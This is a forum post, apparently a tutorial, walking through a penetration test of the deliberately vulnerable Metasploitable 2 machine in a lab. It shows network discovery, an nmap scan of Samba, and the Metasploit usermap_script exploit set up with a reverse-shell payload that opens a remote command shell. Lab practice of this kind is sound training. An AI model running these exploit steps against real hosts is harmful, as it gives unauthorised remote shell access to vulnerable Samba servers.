Jump to content
crossbower

Pentest on Metasploitable 2

By crossbower, in Tutoriale in engleza

Recommended Posts

crossbower Newbie

crossbower

Posted
Posted (edited)

Pentest on Metasploitable 2

The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms.

root@kali:~# netdiscover -i wlan1 -r 192.168.1.1/24
 Currently scanning: 192.168.1.0/24   |   Screen View: Unique Hosts            

 8 Captured ARP Req/Rep packets, from 8 hosts.   Total size: 372              
 __________________________________________________  ___________________________
   IP            At MAC Address      Count  Len   MAC Vendor                  
 -----------------------------------------------------------------------------
 192.168.1.91    08:00:27:4a:6c:50    01    042   CADMUS COMPUTER SYSTEMS      
 192.168.1.202   08:00:27:32:43:96    01    042   CADMUS COMPUTER SYSTEMS      
 192.168.1.1     00:25:53:3e:bc:b9    01    042   Unknown vendor              
 192.168.1.100   00:09:f8:65:35:64    01    060   UNIMO TECHNOLOGY CO., LTD.  
 192.168.1.132   00:21:9b:20:a3:bb    01    060   Unknown vendor

Using nmap scanner for identif. port 139 Samba service.

root@kali:~# nmap -p 139 -sV 192.168.1.91

Starting Nmap 6.40 ( http://nmap.org )
Nmap scan report for 192.168.1.91
Host is up (0.00017s latency).
PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 08:00:27:4A:6C:50 (Cadmus Computer Systems)

And play game :

root@kali:~# service postgresql start && service metasploit start && msfconsole

msf > use exploit/multi/samba/usermap_script
msf  exploit(usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port
Exploit target:
   Id  Name
   --  ----
   0   Automatic
msf exploit(usermap_script) > set RHOST 192.168.1.91
RHOST => 192.168.1.91
msf exploit(usermap_script) > set PAYLOAD cmd/unix/reverse
PAYLOAD => cmd/unix/reverse
msf exploit(usermap_script) > set LHOST 191.168.1.19
LHOST => 191.168.1.19
msf exploit(usermap_script) >
msf  exploit(usermap_script) > exploit

[

*] Started reverse double handler[*] Accepted the first client connection...[*] Accepted the second client connection...[*] Command: echo BgB1yKJSt3wbArQy;[*] Writing to socket A[*] Writing to socket B[*] Reading from sockets...[*] Reading from socket A[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command
not found\r\nBgB1yKJSt3wbArQy\r\n[*] Matching...[*] B is input...[*] Command shell session 1 opened (192.168.1.19:4444 -> 192.168.1.91:42504)

VIDEO TUT

http://www.youtube.com/watch?v=S3uvS3qEpm8

Edited by crossbower

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...